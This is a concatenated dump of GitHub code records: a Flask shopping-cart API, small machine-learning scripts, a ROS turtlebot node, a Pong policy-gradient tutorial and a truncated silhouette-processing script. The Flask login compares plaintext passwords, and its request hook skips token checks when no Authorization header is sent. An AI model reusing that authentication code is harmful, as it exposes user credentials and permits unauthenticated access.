primary_key=True, autoincrement=True)\n customer_id = db.Column(db.Integer, db.ForeignKey(\n 'customer.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), nullable=False)\n status = db.Column(db.Integer, nullable=False)\n created_at = db.Column(db.DateTime, nullable=False,\n server_default=db.func.current_timestamp())\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Order_item(db.Model):\n __tablename__ = 'order_item'\n product_id = db.Column(db.Integer, db.ForeignKey(\n 'product.id', 
ondelete=\"CASCADE\", onupdate=\"CASCADE\"), primary_key=True)\n order_id = db.Column(db.Integer, db.ForeignKey(\n 'order.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), primary_key=True)\n product_qty = db.Column(db.Integer, server_default=None)\n total_price = db.Column(db.Float, server_default=None)\n\n def json(self):\n return {\"product_id\": self.product_id, \"product_qty\": self.product_qty, \"total_price\": self.total_price}\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Product(db.Model):\n __tablename__ = 'product'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.Integer, nullable=False)\n price = db.Column(db.Float, nullable=False)\n description = db.Column(db.Integer, nullable=False)\n category_id = db.Column(db.Integer, db.ForeignKey(\n 'category.id', ondelete=\"CASCADE\", onupdate=\"CASCADE\"), nullable=False)\n image = db.Column(db.Integer, nullable=False)\n qty = db.Column(db.Integer, nullable=False)\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nengine = create_engine(dbURL)\ndb.create_all()\ndb.session.commit()\n\n\n@app.before_request\ndef before_request():\n if request.endpoint != 'login':\n token = request.headers.get('Authorization')\n if token:\n token = token.split()[1]\n if not checkjwt(token):\n return \"Unauthorised\", 403\n\n\ndef checkjwt(token):\n try:\n decoded = jwt.decode(token, app.config.get('SECRET_KEY'), options={\n \"require\": [\"exp\", \"iat\", \"sub\"]}, algorithms=[\"HS256\"])\n id = decoded['sub']\n g.user = Customer.query.filter_by(id=id).first()\n return g.user\n except:\n return None\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n payload = request.get_json()\n username = payload['username']\n password = payload['password']\n customer = Customer.query.filter_by(\n username=username, password=password).first()\n if customer:\n payload = {\n 'exp': datetime.utcnow() + timedelta(days=1),\n 'iat': datetime.utcnow(),\n 'sub': customer.id\n }\n return jwt.encode(payload, app.config.get('SECRET_KEY'), algorithm='HS256')\n else:\n return \"Unauthorised\", 403\n\n\ndef get_orderid(userid):\n existing_cart = Order.query.filter_by(\n customer_id=userid, status=0).first()\n if existing_cart:\n return existing_cart.id\n else:\n data = {\"customer_id\": userid, \"status\": 0}\n new_cart = Order(**data)\n db.session.add(new_cart)\n db.session.commit()\n return new_cart.id\n\n\n@app.route('/api/products')\ndef lst_products():\n products = Product.query.all()\n return jsonify([p.as_dict() for p in products])\n\n\n@app.route('/api/categories')\ndef lst_categories():\n categories = Category.query.all()\n return jsonify([c.as_dict() for c in categories])\n\n\n@app.route('/cart/retrieve', methods=['GET'])\ndef get_orderitems():\n order_id = get_orderid(g.user.id)\n return jsonify({\"order_items\": [orderitem.json() for orderitem in Order_item.query.filter_by(order_id=order_id).all()]})\n\n\n@app.route('/cart/insert', methods=['POST'])\ndef insert_orderitems():\n order_id = get_orderid(g.user.id)\n payload = request.get_json()\n product_id = payload['product_id']\n product_qty = int(payload['product_qty'])\n existing_item = Order_item.query.filter_by(\n order_id=order_id, product_id=product_id).first()\n if existing_item:\n product_qty += existing_item.product_qty\n price = float(Product.query.filter_by(id=product_id).first().price)\n data = {\"product_id\": product_id, \"order_id\": order_id,\n 
\"product_qty\": product_qty, \"total_price\": product_qty*price}\n db.session.merge(Order_item(**data))\n db.session.commit()\n return \"Inserted\", 200\n\n\n@app.route('/cart/delete', methods=['POST'])\ndef delete_orderitems():\n order_id = get_orderid(g.user.id)\n payload = request.get_json()\n product_id = payload['product_id']\n existing_item = Order_item.query.filter_by(\n order_id=order_id, product_id=product_id).first()\n db.session.delete(existing_item)\n db.session.commit()\n return \"Deleted\", 200\n\n\n@app.route('/cart/checkout', methods=['GET'])\ndef checkout():\n order_id = get_orderid(g.user.id)\n order_items = Order_item.query.filter_by(order_id=order_id).all()\n for item in order_items:\n product_id = item.product_id\n product_qty = int(item.product_qty)\n inventory_product = Product.query.filter_by(id=product_id).first()\n new_qty = int(inventory_product.qty) - product_qty\n inventory_product.qty = new_qty\n db.session.delete(item)\n order = Order.query.filter_by(id=order_id).first()\n order.status = 1\n db.session.commit()\n return \"Checked out\", 200\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, threaded=True)\n","repo_name":"Marco-SKN/TT1_Group_16","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21587170308","text":"import numpy as np \nimport time \n\nn_hidden = 10\nn_in = 10\nn_out = 10\n\nn_sample = 300\n\n#hyper parameter\nlearning_rate = 0.01\nmomemtum = 0.9\n\n#non deterministic seeding\nnp.random.seed(0)\n\n#sigmoid activation\ndef sigmoid(x):\n\treturn 1.0/(1.0 + np.exp(-x))\n\n#tangent activation\ndef tanh(x):\n\treturn 1-np.tanh(x)**2\n\n#training\n#x is input\n#t is transpose for matrix multiplication\n#V and W are layers(1 and 2)\n#bv and bw are biases for each layer\ndef train(x, t, V, W, bv, bw):\n\t#forward propogation\n\tA = np.dot(x, V) + bv #matrix multiply + bias\n\tZ = np.tanh(A)\n\n\tB = np.dot(Z, W) + bw\n\tY = sigmoid(B)\n\n\t#back propogation\n\tEw = Y - t\n\tEv = tanh(A) * np.dot(W, Ew)\n\n\t#predict loss\n\tdW = np.outer(Z, Ew)\n\tdV = np.outer(x, Ev)\n\n\t#cross entroy for classification(gives better than Mean square)\n\tloss = -np.mean(t * np.log(Y) + (1 - t) * np.log(1-Y))\n\n\treturn loss, (dV, dW, Ev, Ew)\n\ndef predict(x, V, W, bv, bw):\n\tA = np.dot(x ,V) + bv\n\tB = np.dot(np.tanh(A), W) + bw\n\treturn (sigmoid(B) > 0.5).astype(int)\n\n\n#create layers\nV = np.random.normal(scale=0.1, size=(n_in, n_hidden))\nW = np.random.normal(scale=0.1, size=(n_hidden, n_out))\n\n\nbv = np.zeros(n_hidden)\nbw = np.zeros(n_out)\n\nparams = [V , W, bv, bw]\n\n#generate data\nX = np.random.binomial(1,0.5,(n_sample,n_in))\nT = X ^ 1\n\n#Training\nfor epoch in range(100):\n\terr = []\n\tupd = [0]*len(params)\n\n\tt0 = time.clock()\n\n\t#for each data point update weights\n\tfor i in range(X.shape[0]):\n\t\tloss,grad = train(X[i], T[i], *params)\n\t\t#update loss\n\t\tfor j in range(len(params)):\n\t\t\tparams[j] -= upd[j]\n\n\t\tfor j in range(len(params)):\n\t\t\tupd[j] = learning_rate * grad[j] + momemtum * upd[j]\n\n\t\terr.append(loss)\n\n\tprint('Epoch:%d, Loss: %.8f, Time: %.4fs'%(epoch, np.mean(err), time.clock()-t0))\n\n\n#try to predict some shit\n\nx = np.random.binomial(1, 0.5, n_in)\nprint('XOR 
Prediction')\nprint(x)\nprint(predict(x,*params))\n\n","repo_name":"Navi-nk/Python","sub_path":"neuralNet.py","file_name":"neuralNet.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"9908720770","text":"#Author : Edwin Samuels\r\n#Student number : SMLEDW002\r\n#Date : 20 April 2014\r\n#Function : adds, multiplies and normalises vectors\r\n#Title : Question2\r\n\r\nfrom math import *\r\n\r\n\r\ndef vector_add(vectora, vectorb):\r\n\r\n \"\"\"Returns the sum of two vectors in the form of a list\"\"\"\r\n\r\n vector_sum = []\r\n for i in range(3):\r\n #adds the sum of each component to a new list\r\n vector_sum.append(vectora[i] + vectorb[i])\r\n\r\n return vector_sum\r\n\r\n\r\ndef vector_multiplier(vectora, vectorb):\r\n\r\n \"\"\"Returns the dot product of two vectors as a number\"\"\"\r\n\r\n vector_multiplied = []\r\n for i in range(3):\r\n #adds the product of each component to a new list\r\n vector_multiplied.append(vectora[i] * vectorb[i])\r\n\r\n return sum(vector_multiplied)\r\n\r\n\r\ndef vector_normalization(vector):\r\n\r\n \"\"\"Determines the norm of a vector\"\"\"\r\n\r\n sum_squared = 0\r\n index_no = 0\r\n\r\n for i in range(3):\r\n sum_squared += (vector[index_no]) ** 2\r\n index_no += 1\r\n return \"{0:.2f}\".format(sqrt(sum_squared))\r\n\r\n#Gets a vector in the form of a list of digits\r\n\r\nvector_A = list(map(eval, (input(\"Enter vector A:\\n\").split())))\r\n\r\nvector_B = list(map(eval, (input(\"Enter vector B:\\n\").split())))\r\n\r\nprint(\"A+B =\", vector_add(vector_A, vector_B))\r\nprint(\"A.B =\", vector_multiplier(vector_A, vector_B))\r\nprint(\"|A| =\", vector_normalization(vector_A))\r\nprint(\"|B| =\", vector_normalization(vector_B))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/smledw002/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"28035834529","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split # train-test split\nfrom sklearn.linear_model import LogisticRegression\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndata = pd.read_csv(\"ortopedik_hastaların_biyomekanik_özellikleri.csv\")\nprint(data.head())\n\n# Build a new Series with the per-class counts\nclass_counts = data[\"class\"].value_counts()\n\n# Visualize using the Series of class counts\nplt.figure(figsize=(8, 6))\nsns.barplot(x=class_counts.index, y=class_counts.values)\nplt.title(\"Class Distribution\")\nplt.xlabel(\"Class\")\nplt.ylabel(\"Output\")\nplt.xticks(rotation=45)\nplt.show()\n\n#abnormal = 1, normal = 0\ndata[\"class\"] = [1 if each == \"Abnormal\" else 0 for each in data[\"class\"]]\ndata.head()\nprint(data.info())\n\ny = data[\"class\"].values\nx_data = data.drop([\"class\"],axis=1)\n\nsns.pairplot(x_data)\nplt.show()\n\n# We need to normalize the data, squeezing every value between 0 and 1\nx = (x_data - np.min(x_data)) / (np.max(x_data) - np.min(x_data)).values\nprint(x)\n\n# 85% training, 15% test\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size= 0.15, random_state=42)\n\n# take the transpose\nx_train = x_train.T\nx_test = x_test.T\ny_train = y_train.T\ny_test = 
y_test.T\n\nprint(\"x_train: \", x_train.shape)\nprint(\"x_test: \", x_test.shape)\nprint(\"y_train: \", y_train.shape)\nprint(\"y_test: \", y_test.shape)\n\n# training\nlr = LogisticRegression()\nlr.fit(x_train.T, y_train.T)\nprint(lr)\n\n# test\ntest_dogrulugu = lr.score(x_test.T, y_test.T)\nprint(\"Test accuracy: {}\".format(test_dogrulugu))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"htasoftware99/MachineLearningAlgorithms","sub_path":"Regression/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"22262752961","text":"import random\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import String\n\nclass Turtlebot:\n def __init__(self, name):\n self.name = name\n self.move_random = Twist()\n self.pub_cmd_vel = rospy.Publisher(f\"/{name}/cmd_vel\", Twist, queue_size=10)\n self.pub_location = rospy.Publisher(\"/turtlebot_locations\", String, queue_size=10)\n self.sub_scan = rospy.Subscriber(f\"/{name}/scan\", LaserScan, self.callback)\n self.sub_odom = rospy.Subscriber(f\"/{name}/odom\", Odometry, self.odom_callback)\n self.sub_location = rospy.Subscriber(\"/turtlebot_locations\", String, self.location_callback)\n\n def callback(self, laser):\n threshold = 1\n random_velocity_linear_x = random.randint(-5, 5)\n random_velocity_angular_z = random.randint(-5, 5)\n\n if laser.ranges[0] > threshold and laser.ranges[15] > threshold and laser.ranges[345] > threshold:\n if random_velocity_linear_x > 0:\n self.move_random.linear.x = random_velocity_linear_x\n self.move_random.angular.z = random_velocity_angular_z\n else:\n self.move_random.linear.x = 0\n self.move_random.angular.z = random_velocity_angular_z\n else:\n if random_velocity_linear_x > 0:\n self.move_random.linear.x = 0.0\n self.move_random.angular.z = random_velocity_angular_z\n else:\n self.move_random.linear.x = random_velocity_linear_x\n self.move_random.angular.z = 0\n\n if laser.ranges[0] > threshold and laser.ranges[15] > threshold and laser.ranges[345] > threshold:\n self.move_random.linear.x = random_velocity_linear_x\n self.move_random.angular.z = 0.0\n\n self.pub_cmd_vel.publish(self.move_random)\n\n def odom_callback(self, odom):\n location_data = f\"{self.name}: {odom.pose.pose.position.x}, {odom.pose.pose.position.y}\"\n self.pub_location.publish(location_data)\n\n def location_callback(self, location_data):\n if not location_data.data.startswith(self.name):\n print(f\"{self.name} received location data: {location_data.data}\")\n\ndef stop_turtlebots(turtlebots):\n stop_twist = Twist()\n for tb in turtlebots:\n tb.pub_cmd_vel.publish(stop_twist)\n print(\"shutdown time!\")\n\nif __name__ == \"__main__\":\n rospy.init_node('trying_to_avoidance_obestacle')\n rate = rospy.Rate(10)\n\n turtlebot_names = ['tb3_0', 'tb3_1', 'tb3_2']\n turtlebots = [Turtlebot(name) for name in turtlebot_names]\n\n rospy.on_shutdown(lambda: stop_turtlebots(turtlebots))\n \n try:\n rospy.spin()\n except:\n print(\"error\")\n","repo_name":"ebagirma/Multi-Robot-Path-Planning","sub_path":"src/turtlebot_navigation_and_mapping/nodes/move_random.py","file_name":"move_random.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"19441825372","text":"# Code from Karpathy's \"Pong From Pixels\" with additional\n# comments 
to explain what different parts of the program do.\n\n\nimport numpy as np #matrix math\nimport pickle #serializing data (save/load model)\nimport gym #atari environment\n\n\n# no hard coded rules\n# algorithm, not environment\n# 1) receive image from the game (game STATE)\n# 2) binary decision - move paddle up or down\n# 3) make an action, receive a reward\n# Action list: +1 for getting ball past AI,\n# -1 for letting ball go past, 0 for any other action\n\n# general algorithm for any game\n# 2 layer neural network that takes in frames of the game (STATE),\n# output is a probablility value of whether to move up or down\n# we sample from probability value to get POLICY, getting gradient\n# as we backpropagate.\n\n#stochastic: non-deterministic, unpredictable, random, making decisions that are NOT predetermined.\n#adding variation into networks to try and mimic human behavior.\n#gradients == partial derivatives\n\n\n#hyperparameters\nH = 200 #number of hidden neurons\nbatch_size = 10 #number of episodes in a parameter update\nlearning_rate = 0.0001 #learning_rate\ngamma = 0.99 #discount factor (later rewards are less important, optimizing for short term)\ndecay_rate = 0.99 #RMSprop\nresume = False\n\n#init model\nD = 80 * 80 #input dimensionality\nif resume:\n model = pickle.load(open('save.p', 'rb'))\nelse:\n model = {}\n #initializing rates pseudo-randomly (Xavier initialization)\n #Xavier initialization: taking the hidden nodes into account\n #when we intialize nodes (http://andyljones.tumblr.com/post/110998971763/an-explanation-of-xavier-initialization)\n #W1: input D computed into some vector\n #W2: dealing only with hidden weights\n model['W1'] = np.random.randn(H,D) / np.sqrt(D)\n model['W2'] = np.random.randn(H) / np.sqrt(H)\n#gradient buffer helps with backpropagation. 
Used to store gradients.\ngrad_buffer = { k : np.zeros_like(v) for k,v in model.items() } \n## rmsprop (gradient descent) memory used to update model\nrmsprop_cache = { k : np.zeros_like(v) for k,v in model.items() } \n\n#activation function\n#sigmoid is used at end of backpropagation to return values as probabilities\ndef sigmoid(x):\n return 1.0 / (1.0 + np.exp(-x)) #squashing(converting vectors into probabilities)\n\n#preprocessing function: converts game image frame I into paddles and ball\ndef prepro(I):\n I = I[35:195] #cropping the game frame\n I = I[::2, ::2, 0] #downsampling by factor of 2\n I[I == 144] = 0 #erase background layer 1\n I[I == 109] = 0 #erase background layer 2\n I[I != 0] = 1 #paddles and balls set to 1\n return I.astype(np.float).ravel() #flatten\n\n#optimizing for short term rewards by weighing each reward differently by how early they occurred\n#source: https://github.com/hunkim/ReinforcementZeroToAll/issues/1\n#weighing immediate rewards higher than later rewards exponentially\n#short term: did the ball go past the AI paddle?\ndef discount_rewards(r):\n discounted_r = np.zeros_like(r)\n running_add = 0\n for t in reversed(range(0, r.size)):\n if r[t] != 0: running_add = 0\n #increment sum\n running_add = running_add * gamma + r[t]\n discounted_r[t] = running_add\n return discounted_r\n\n#forward propgation:\ndef policy_forward(x):\n h = np.dot(model['W1'], x)\n h[h < 0] = 0 #ReLU: take the max between 0 and h\n logp = np.dot(model['W2'], h)\n p = sigmoid(logp)\n return p, h #return propability of taking action 2 and hidstate\n\n#backpropagation: recursively compute error derivatives for both network layers (W1 and W2)\n#programatically the chain rule\n#epdlogp: modulate the _ with advantage\ndef policy_backward(eph,epdlogp):\n #eph is array of intermediate states\n #derivative wrt W2\n dw2 = np.dot(eph.T, epdlogp).ravel()\n dh = np.outer(epdlogp, model['W2'])\n dh[eph <= 0] = 0 #reLU\n #derivative wrt W1\n dw1 = np.dot(dh.T, epx)\n #return both derivatives to update weights\n return {'W1':dw1, 'W2':dw2}\n\n#implementation details\nenv = gym.make('Pong-v0')\nobservation = env.reset()\nprev_x = None\nxs, hs, dlogps, drs = [], [], [], []\nrunning_reward = None\nreward_sum = 0\nepisode_number = 0\n#print(\"Number of states\")\n#print(env.observation_space.n)\n\n\nwhile True:\n\n\n cur_x = prepro(observation)\n x = cur_x - prev_x if prev_x is not None else np.zeros(D)\n prev_x = cur_x\n\n\n\n aprob, h = policy_forward(x)\n action = 2 if np.random.uniform() < aprob else 3 # roll the dice!\n\n\n xs.append(x)\n hs.append(h)\n y = 1 if action == 2 else 0\n dlogps.append(y - aprob)\n\n #env.render()\n observation, reward, done, info = env.step(action)\n reward_sum += reward\n\n drs.append(reward)\n\n if done:\n episode_number += 1\n\n \n epx = np.vstack(xs) \n eph = np.vstack(hs) \n epdlogp = np.vstack(dlogps) \n epr = np.vstack(drs)\n xs,hs,dlogps,drs = [],[],[],[] \n\n \n discounted_epr = discount_rewards(epr)\n discounted_epr -= np.mean(discounted_epr)\n discounted_epr /= np.std(discounted_epr)\n\n\n epdlogp *= discounted_epr\n grad = policy_backward(eph, epdlogp)\n for k in model: grad_buffer[k] += grad[k] \n\n \n if episode_number % batch_size == 0:\n for k,v in model.items():\n g = grad_buffer[k] \n rmsprop_cache[k] = decay_rate * rmsprop_cache[k] + (1 - decay_rate) * g**2\n model[k] += learning_rate * g / (np.sqrt(rmsprop_cache[k]) + 1e-5)\n grad_buffer[k] = np.zeros_like(v)\n\n \n running_reward = reward_sum if running_reward is None else running_reward * 0.99 + 
reward_sum * 0.01\n print('resetting env. episode reward total was %f. running mean: %f' % (reward_sum, running_reward))\n if episode_number % 100 == 0: pickle.dump(model, open('save.p', 'wb'))\n reward_sum = 0\n observation = env.reset()\n prev_x = None\n\nprint(env.observation_space)\nif reward != 0:\n print(('ep %d: game finished, reward: %f' % (episode_number, reward)) + ('' if reward == -1 else ' !'))\n","repo_name":"fxswiatowicz/cogs298-project","sub_path":"pong_commented_tutorial.py","file_name":"pong_commented_tutorial.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"44075462710","text":"import argparse\nfrom pathlib import Path\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom os.path import join\nimport os\nimport shutil\nimport cv2 as cv\nfrom pca.nn_util import crop_silhouette_pair, verify_pose_variants_per_name, remove_pose_variant_in_file_name\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom multiprocessing import Pool\nfrom functools import partial\nimport tempfile\nfrom pca.pca_vic_model import PcaModel\nfrom sklearn.externals import joblib\nimport sklearn\nfrom common.util import find_largest_contour, smooth_contour, resample_contour\n\nlabel_colors = {'head':(128,0,0), 'torso':(255,85,0),\n 'larm':(51,170,221), 'rarm':(0,255,255),\n 'lleg_upper':(0,85,85,0), 'rleg_upper':(0,150,25),\n 'lleg_lower':(85,255,170), 'rleg_lower':(170,255,85),\n 'lfoot':(255,255,0), 'rfoot':(255,170,0)}\n\ndef body_part_mask(rgb_img, rgb_value, rgb_epsilon):\n if isinstance(rgb_epsilon, int):\n rgb_epsilon = (rgb_epsilon, rgb_epsilon, rgb_epsilon)\n\n r_mask = np.bitwise_and(rgb_img[:,:,0] > rgb_value[0]-rgb_epsilon[0], rgb_img[:,:,0] < rgb_value[0]+rgb_epsilon[0])\n g_mask = np.bitwise_and(rgb_img[:,:,1] > rgb_value[1]-rgb_epsilon[1], rgb_img[:,:,1] < rgb_value[1]+rgb_epsilon[1])\n b_mask = np.bitwise_and(rgb_img[:,:,2] > rgb_value[2]-rgb_epsilon[2], rgb_img[:,:,2] < rgb_value[2]+rgb_epsilon[2])\n mask = np.bitwise_and(r_mask, np.bitwise_and(g_mask, b_mask))\n return (mask*255).astype(np.uint8)\n\ndef extract_body_part_masks(img_rgb):\n body_masks = {}\n for k, v in label_colors.items():\n mask = body_part_mask(img_rgb, v, 10)\n body_masks[k] = mask\n return body_masks\n\ndef segment_body_part_sil_f(path):\n img = cv.imread(str(path))\n img = img[400:, :, ::-1]\n\n masks = extract_body_part_masks(img)\n img_1 = img.copy()\n contours = []\n for k, mask in masks.items():\n contour = find_largest_contour(mask, app_type=cv.CHAIN_APPROX_NONE)\n X, Y = smooth_contour(contour[:,0,0], contour[:,0,1], sigma=4)\n contour_1 = np.vstack([X,Y]).T\n contours.append(contour_1)\n cv.fillConvexPoly(img_1, contour_1.reshape(-1,1,2), color=label_colors[k])\n\n plt.subplot(121)\n plt.imshow(img)\n plt.subplot(122)\n plt.imshow(img_1)\n plt.show()\n\ndef copy_files(paths, out_dir, args):\n for path in Path(out_dir).glob('*.*'):\n os.remove(str(path))\n\n os.makedirs(out_dir, exist_ok=True)\n for path in tqdm(paths, desc=f'copied files to {out_dir}'):\n out_name = str(path.stem).replace('_front','')\n out_name = out_name.replace('_side', '')\n shutil.copy(src=path, dst=join(*[out_dir, f'{out_name}.jpg']))\n\ndef copy_train_valid_test(name_ids, id_to_path_dict, train_idxs, valid_idxs, test_idxs, out_dir, args):\n train_dir = join(*[out_dir, 'train'])\n valid_dir = join(*[out_dir, 'valid'])\n test_dir = join(*[out_dir, 'test'])\n\n 
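The pong record above credits earlier frames with exponentially discounted reward and resets the running sum whenever a point is scored; a standalone sketch of that backward pass, using the same gamma of 0.99 the record uses:

import numpy as np

def discount_rewards(r, gamma=0.99):
    # walk backwards so each frame inherits gamma-decayed credit from the future
    out = np.zeros_like(r, dtype=np.float64)
    running = 0.0
    for t in reversed(range(len(r))):
        if r[t] != 0:
            running = 0.0  # game boundary (a point was scored): reset the sum
        running = running * gamma + r[t]
        out[t] = running
    return out

# three neutral frames before a win share the credit, decayed by gamma
print(discount_rewards(np.array([0.0, 0.0, 0.0, 1.0])))  # [0.970299 0.9801 0.99 1.]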
copy_files([id_to_path_dict[name_ids[idx]] for idx in train_idxs], train_dir, args)\n copy_files([id_to_path_dict[name_ids[idx]] for idx in valid_idxs], valid_dir, args)\n copy_files([id_to_path_dict[name_ids[idx]] for idx in test_idxs], test_dir, args)\n\ndef extract_silhouette(img, background_I, epsilon):\n masks = []\n for i in range(3):\n m = np.bitwise_and(img[:,:,i] > background_I - epsilon, img[:, :, i] < background_I + epsilon)\n masks.append(m)\n\n mask = np.bitwise_and(np.bitwise_and(masks[0], masks[1]), masks[2])\n return np.bitwise_not(mask).astype(np.uint8)*255\n\ndef binarize_blender_img(img):\n # TODO: this value is very important. It must match with the background color from images generated by Blender\n background_intensity = 54\n epsilon = 5\n bi_img = extract_silhouette(img, background_intensity, epsilon)\n return bi_img\n\ndef crop_a_pair(size, path_pair):\n fpath = path_pair[0]\n spath = path_pair[1]\n\n img_f = cv.imread(str(fpath))\n img_s = cv.imread(str(spath))\n\n assert img_f is not None, f'{fpath} image does not exist'\n assert img_s is not None, f'{spath} image does not exist'\n\n sil_f = binarize_blender_img(img_f)\n sil_s = binarize_blender_img(img_s)\n\n # plt.subplot(121), plt.imshow(sil_f)\n # plt.subplot(122), plt.imshow(sil_s)\n # plt.show()\n\n sil_f, sil_s, _, _ = crop_silhouette_pair(sil_f, sil_s, mask_f=sil_f, mask_s=sil_s, target_h=size[0], target_w=size[1], px_height=int(0.9 * size[0]))\n #sil_f, sil_s = crop_silhouette_pair_blender(sil_f, sil_s, size)\n\n #plt.subplot(121), plt.imshow(sil_f)\n #plt.subplot(122), plt.imshow(sil_s)\n #plt.show()\n\n cv.imwrite(str(fpath), img=sil_f)\n cv.imwrite(str(spath), img=sil_s)\n\ndef erase_arm_side_profile(img_rgb):\n #arm color\n arm_rgb = (51, 170, 221)\n torso_rgb = (255, 86, 0)\n arm_mask = body_part_mask(img_rgb, arm_rgb, (5, 5, 5))\n arm_mask = cv.morphologyEx(arm_mask, cv.MORPH_DILATE, cv.getStructuringElement(cv.MORPH_RECT,(5,5)))\n arm_mask = arm_mask == 255\n img_rgb[arm_mask] = torso_rgb\n return img_rgb\n\ndef crop_a_pair_color(size, path_pair):\n fpath = path_pair[0]\n spath = path_pair[1]\n\n img_f = cv.imread(str(fpath))\n img_s = cv.imread(str(spath))\n\n assert img_f is not None, f'{fpath} image does not exist'\n assert img_s is not None, f'{spath} image does not exist'\n\n #TODO: hack. remove arm in the side profile\n img_s = erase_arm_side_profile(img_s[:,:,::-1])\n img_s = img_s[:,:,::-1]\n\n mask_f = binarize_blender_img(img_f)\n mask_s = binarize_blender_img(img_s)\n img_f[mask_f==0, :] = (0,0,0)\n img_s[mask_s==0, :] = (0,0,0)\n\n #plt.subplot(121), plt.imshow(img_f)\n #plt.subplot(122), plt.imshow(img_s)\n #plt.show()\n\n img_f, img_s, _, _ = crop_silhouette_pair(img_f, img_s, mask_f=mask_f, mask_s=mask_s, target_h=size[0], target_w=size[1], px_height=int(0.9 * size[0]))\n\n #plt.subplot(121), plt.imshow(img_f[:,:,::-1])\n #plt.subplot(122), plt.imshow(img_s[:,:,::-1])\n #plt.show()\n\n cv.imwrite(str(fpath), img=img_f)\n cv.imwrite(str(spath), img=img_s)\n\ndef crop_pairs(sil_f_dir, sil_s_dir, size, is_color):\n fpaths = sorted([path for path in Path(sil_f_dir).glob('*.*')])\n spaths = sorted([path for path in Path(sil_s_dir).glob('*.*')])\n for fpath, spath in zip(fpaths, spaths):\n assert fpath.name == spath.name\n\n path_pairs = [(fpath, spath) for fpath, spath in zip(fpaths, spaths)]\n\n pair_process_func = crop_a_pair_color if is_color else crop_a_pair\n\n with Pool(10) as p:\n with tqdm(total=len(path_pairs), desc=f'cropping pair. 
is_color = {is_color}: {Path(sil_f_dir).stem}, {Path(sil_s_dir).stem}') as pbar:\n for i, _ in enumerate(p.imap_unordered(partial(pair_process_func, size), path_pairs)):\n pbar.update()\n\ndef crop_train_test_valid(base_sil_f_dir, base_sil_s_dir, size, is_color):\n names = ['train', 'test', 'valid']\n for name in names:\n f_dir = join(*[base_sil_f_dir, name])\n s_dir = join(*[base_sil_s_dir, name])\n crop_pairs(f_dir, s_dir, size, is_color)\n\ndef copy_file_prefix(in_dir, out_dir, prefix, n_file = -1):\n os.makedirs(out_dir, exist_ok=True)\n\n paths = list([path for path in Path(in_dir).glob('*.*')])\n paths = sorted(paths)\n #paths = sklearn.utils.shuffle(paths)\n if n_file > 0:\n paths = paths[:n_file]\n\n for path in tqdm(paths, desc= f'copy_file_prefix {prefix}'):\n shutil.copy(str(path), os.path.join(*[out_dir, f'{prefix}_{path.name}']))\n\ndef copy_target_prefix(in_dir, out_dir, prefix, pose_duplicate = 0, n_files = -1):\n assert prefix in ['_male', '_female']\n os.makedirs(out_dir, exist_ok=True)\n\n ex_val = np.array([1.0]) if prefix == '_male' else np.array([0.0])\n\n paths = sorted([path for path in Path(in_dir).glob('*.*')])\n if n_files > 0:\n paths = paths[:n_files]\n\n for path in tqdm(paths, desc=f'copy_target_prefix {prefix}'):\n param = np.load(path)\n param = np.hstack([ex_val, param])\n if pose_duplicate == 0:\n np.save(os.path.join(*[out_dir, f'{prefix}_{path.name}']), param)\n else:\n for i in range(pose_duplicate):\n np.save(os.path.join(*[out_dir, f'{prefix}_{path.stem}_pose{i}{path.suffix}']), param)\n\ndef remove_missing_pair(sil_f_dir, sil_s_dir):\n sil_f_names = set([path.name for path in Path(sil_f_dir).glob('*.*')])\n sil_s_names = set([path.name for path in Path(sil_s_dir).glob('*.*')])\n\n common_names = sil_f_names.intersection(sil_s_names)\n\n bad_f_names = sil_f_names.difference(common_names)\n bad_s_names = sil_s_names.difference(common_names)\n\n for name in bad_f_names:\n print(f'remove file {name}')\n path = os.path.join(*[sil_f_dir, name])\n os.remove(path)\n\n for name in bad_s_names:\n print(f'remove file {name}')\n path = os.path.join(*[sil_s_dir, name])\n os.remove(path)\n\ndef verify_missing_pair(sil_f_dir, sil_s_dir):\n sil_f_names = [path.name for path in Path(sil_f_dir).glob('*.*')]\n sil_s_names = [path.name for path in Path(sil_s_dir).glob('*.*')]\n sil_f_names = sorted(sil_f_names)\n sil_s_names = sorted(sil_s_names)\n\n for f_name, s_name in zip(sil_f_names, sil_s_names):\n assert f_name == s_name, 'missing pair'\n\ndef dump_heights(pca_in_dir, pca_ml_model_path, pca_fml_model_path, height_out_path, n_files = -1):\n ml_model = 